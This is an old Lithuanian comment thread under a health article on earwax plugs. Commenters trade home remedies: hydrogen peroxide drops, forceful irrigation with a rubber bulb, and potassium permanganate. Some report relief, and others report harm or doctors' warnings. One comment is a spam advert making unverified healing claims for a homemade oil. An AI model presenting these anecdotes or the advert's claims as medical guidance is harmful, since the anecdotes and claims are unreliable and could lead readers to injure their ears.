pries 2 dienas valiausi ausis krapstuku ir pajutaun kaip kazkasn ausyje uzsikiso, tada perskaicius si patarima su vandenilio peroksidu pameginau isbandyti pati.Taigi ilasinau apie kokius 5 lasus peroksido ir laukiau apie 15 min tiksliau tol kol ausyje nustojo trasketi.tada isipyliau silto vandens ir su gumine kriause stipriai puciau vandeni apie kokia 15 min ipurskiu vandens ir isbeginu nulenkus galva ir taip kokius 10 kartu, ir patikekit manim - atsikimso.........negaliu patiketi bet tikra palaima po keliu dienu negirdejimo!!!!
mesa
2009-10-23 16:30
reiks siandien pamegint, pas gydytoja pakliuti neimanoma, pusiu pats. paprastai metus maziausiai po karta vaiksciodavau pas LOR`a, paskutiniu metu rodos geriau buvo, dabar vel uzkrito..
any
2009-09-14 16:15
Man pastoviai naktimis uzia, kartais prabundu ir negaliu uzmigti. Nervuoja juodai, reiks pabandyti issiplauti ausis...
Rita
2009-09-01 15:09
Seip niekada neatlikineciau sios proceduros namie. Geriau jau nueti pas LOR. Bent pasako tiksliai kas yra. Pvz, pris savaite ejau valytis kamsti, man apziurejo ausi nuodugniai. Pasirodo ausi isimetes uzdegimas buvo ir dar zaizdeliu buvo. Isvale kamsi ir israse antibiotiku, nes ausi skaudejo. Ir pasake, kad geriau eiti iskart pas gyditoja, nei paciai imtis visokiu priemoniu. Pagyre bent uz tai, kad lasinau siera minkstinancius vaistus &rdquo;Tropex&rdquo;... bet zinoma tie vaistai neatkemsa ausies kai ji uzsikimsusi.
l
2009-07-20 06:59
Mielos paneles , noriu su jumis pasidalinti neitiketinu atradimu, kuris dabar vissikai pakeite mano problematiskos veido bei nusiurusiu plauku struktura.Tai gydomasis mociutes aliejus, kuri ji pati gamina, kaip as net nezinau, nes neisduoda paslapciu, bet turi ten visokiu misinuku labia geru prisigaminus,kuriu poveikis super..Skamba labia keistai, bet tik sis naturalus preparatelis man pagelbejo, nes, kad ir kiek bandziau tu priemoniu naudoti, tai atrasti tinkama prilygtu kaip kokioj loterijoj laimeti.Si alieju mano mociute vartoja jau labai ilgai ir tai puikiai matosi paziurejus I jos skaiscia oda bei standzius tvirtus blizgius plaukus.Pati ji vartoju tik menesi laiko ir negaliu patiketi, koki poveiki jis daro.Visu pirma labai patiko, kad ji uztepus pries einant gult ant veido jis nepalieka tokio riebalo poveikio, kuris uzkemsa poras.Ypac tinka sausai bei jautriai veido odai, aisku tinka ir riebesniai , tik tada jo maziau vartoti reikia.Kaip minejo mociute , tai jis regeneruoja lasteles, sutraukia visus odos itrukimus, naikina bakterijas, turi pries uzdegimini poveiki, o plaukams suteikia ypatinga tvirtuma bei blizguma, o imasazavus galvos oda puikiai tinka kaip augimo skatinimo priemone.Dar man asmeniskai labai patiko, kad per nakti ji laikant jis labai graziai susigeria, ryte oda kaip kudikelio, tada galima labai puikiai bei lygiai padengti veida pudra, odo issilaiko labia skaisti visa diena bei makiazas nenubega.O dar jis puikiai tinka kaip balzamas po galvos isplovimo, jei plaukai elektrinasi, tereikia issiplaunant pora lasu dregnus plaukus suvilgyti ir jie ramut ramuteliai bei nesulipe.Dar sis aliejus tinka ir visam kunui , tik reikia poros lasu besiprausiant ir oda labai sveika atrodo ;) isties labia dziaugiuosi gavusi si aliejuka .Rasau ne todel, kad pasigirt, koks jis super, bet tiesiog noriu pagelbeti jums, ypac kaip minejau jis tinka sausesnei tipo odai, bet plaukams naudojant tai visoms idealiai tinka , akivaizdus pokytis matyti iskart panaudojus ryte , tai vat , noriu ir galiu siek tiek jo parupinti ir jums , jei susidomejote;) Kaina tikrai nedidele, manau 100ml.-25 lt. cia mazdaug , o uztektu geram pusmeciui,aisku dar galetume tartis, jei didesni kieki imtumete ir panasiai… Taip pat dar turiu ir kitokiu kuno prieziuros priemoniu, tiesiog parasykite, kokios problemos kankina, o as paziuresiu, kuo galiu pagelbeti ;) Nenoriu jums pasirodyti kaip kokia pardavimu agente, bet tiesiog labai dziaugiuosi jo poveikiu, o uz dyka dalinant siek tiek pati I nuostoli nueisiu :D tad labai lauksiu susidomejusiu merginu laiskuciu, rasykit I gmail : lululu.edita@gmail.com ;)
man padeda
2009-07-16 11:02
Jau kelis kartus isploviau su didele kriause, pripildamas silto vandens ir stipriai spaudziant kriause. Po kokiu 10 min plovimu kamstis iseidavo. Tiesa, dariau be peroksido.
Tomas
2009-06-19 17:02
Jokiu budu nebandykite sio metodo. jaigu jums uzsikimso ausys tai nereiskia kad susidare sieros kamstis. aisku sito nezinodamas as lasinau peroksida ir ploviau ausi. Bet nuo to tikrai geriau nebuvo. Tada kreipiausi i LOR ( ausu , nosies, gerkles daktara) jis pasake kad man AUSU BUGNELIU ISLINKIMAS ir JOKIU BUDU I AUSI NEGALIMA LASINTI NIEKO. Kaip pasakiau kad lasinau peroksida ir ploviau ausi jis pasake kad kelis kartus PABLOGINAU esama padeti. Mano simptomai buvo tokie patys kaip ir parasyta CIA. Galvojau kad man sieros kamstis. Taigi visiems siulau neeksperimentuoti namuose o eiti pas tam tikros specelybes daktarus. P.S kai paklausiau ar nuo sieros kamscio peroksidas padeda LOR pasake kad jis tik sukelia uzdegima ir jokiu budu jo lasinti i ausi negalima!!!!!!
gexas
2009-04-13 22:36
Man mama vaikysteje plaudavo su dideliu svirkstu be adatos pirma ilasindavo ausu lasu ir uzkimsdavo vata, po 10 minuciu ar daugiau nelabai stipria srove pradedavo plauti virs indo su vandeniu. dabar kazka panasaus pats darysiu, nes peroksidu kiek dariau, tai seniau padedavo.. o dabar nebepadeda.. matyt per didelis kamstis pasidare.
Mantas
2009-03-23 16:59
Aš ka tik sutaupiau nemažai pinigų, nes norėjau eiti į privačią kliniką dėl to kamščio. Man užteko porą kartų pripildyti ausį peroksidu ir ausis atsikimšo:))Tikrai geras jausmas.
Silva
2009-03-14 15:49
Ir as buvau susidurusi su tokia problema,tai gerai kad paciu laiku paskaiciau sita straipsni ir is karto puoliau taip daryti kaip buvo parasyta. Ir man padejo! Labai aciu uz gera patarima,kita karta vel taip pat darysiu kai iskils tokia beda. Ir dar nuo saves turiu viena patarima:) Kai i ausi leisites vandeni tai sakykit &rdquo;SOKOLADAS&rdquo;,tikrai padeda:)
mingus
2008-12-30 19:30
buvo linksma ir pavyko.aciu
miami
2008-10-15 20:38
o kai as ilasinau vaistu i ausi, tai man jin dar labaiu uzgule? ar cia gal taip turi buti?
:)
2008-09-21 19:55
Nepavydziu man irgi taip buvo
Domas
2008-09-19 14:37
Na mane kamuoja baisus vargai.Seniau buvau pas ausu daktara ir nustate sieros kamscius.Israse vaistus,lasinau apie 3 savaites ir spengimas ausyse baigesi.Dabar po 1metu uzejo varginantys nakti(tyloje)spengimas galvoje.Taigi bandysiu su vandenilio peroksidu ar vaistais.Kam taip buvo prasau atsiliepkit ;)
lolius13
2008-07-14 10:36
NZn niekas cia nedapadeda pakartojau 4 kartus ir bbs.
kiesa
2007-12-26 17:42
man sieros kamstis o klinikos kaune nepadejo liepe varyt i poliklinika o ta nedirba
kiesa
2007-12-26 11:02
man kastis ir klinikos kaune nepadejo liepe varyt i poliklinika o ta dirba
kiesa
2007-12-26 11:02
man kastis ir klinikos kaune nepadejo liepe varyt i poliklinika o ta dirba
nukentejusi....
2007-12-22 14:55
Nuo pat mazens gal nuo kokiu 2 metu man prasidejo ausu ligos stai tokie uzgulimai ir netgi uzdegimai gal iki kokiu 10 metu man tai nutikdavo kasmet spalio menesi... tai jau budavo tradicija...dabar man 14 metu ir pfu pfu pfu jau to nebera buve ir nebesu lankiusi tos baisios ausu gydytojos... man tai buvo pati didziausia kancia... ji man krapstydavo ausis su visokiais gelzgaliais po to plaudavo... o kai as verkdavau is skausmo ant manes saukdavo... dabar ai rasant man bega asaros... zinau tai atrodo nerealu bet taip budavo ir dabar po 4 metu pertraukos man vel uzgule ausi ir labai bijau kad nereiktu vel pas ja eit (ji dar tebedirba)... todel paskaicius si straipsni pirmadieni eisiu i vaistine pirkt kriauses ir pipetes ir butinai atliksiu sia procedura... kad tik nereiktu eit pas ta kvaile...labai aciu kas idejote toki straipsni
Nika
2007-10-17 09:20
Jau daugybe metu,pasiemusi gumine kriause,plaunu ausis pati.Tai man prisieina daryti viena karta i metus butinai.Bet tris kartus man plove ausis poliklinikoje,is kuriu viena karta gydytojas mestelejo fraze,jog as nevalau ausu.Toks poziuris egzistuoja.Ir,kadangi as nesu kokia tai nevala,mane tai zeidzia.Kiek tame yra tiesos?
ramune
2007-06-18 20:58
peroksidas man labai padejo.jau bandziau dauk kartu.
ausis
2007-06-11 16:21
na pas mane ta beda pastovi su tais kamsciais :( kelis kartus jau plove ausis su kalio permanganatu LOR&rsquo;as pat dar nebandziau
Giedre
2007-06-08 21:03
man tai nesenai isplove ausi gydytoja ir ka?pf.dabar dar blogiau girdziu su viena ausim....nezinau ka daryt dabar:((( jei kas zinot kaip padet rasykit dark_secret551@yahoo.com buciau labai dekinga
ausyte
2007-03-02 17:53
as paimu truputi didesne nei maza gumine kriause. prisipilu i inda silto vandens, iberiu kalio permanganato, prisiurbiu vandens, istatau kriauses galiuka i ausi ir smarkiai spaudziu, palinkusi virs indo. Nuo vandens sroves ish ausies kamstis atmirksta ir ishlekia :) Tik cia paskaicius susimasciau - gal per stipriai as cia taip darau? gal galiu susizesti???? nors kol kas sis budas padejo be jokiu problemu. :)))
13-mete
2006-10-30 23:20
o tai galima vaikams? man 13 metu. Ar taip galima bandyti?
raganas
2006-10-29 19:31
Nefiga nieko nepadejo:((((
Rodyti daugiau komentarų

Parašykite savo nuomonę

 • :)
 • (happy)
 • :D
 • (super)
 • (hi)
 • (red)
 • (fu)
 • (fool)
 • (weird)
 • :P
 • :(
 • (hooray)
 • (bad)
 • (think)
 • 8|
 • (ok)

Straipsniai šioje grupėje

Video

Mūsų draugai

Mūsų draugai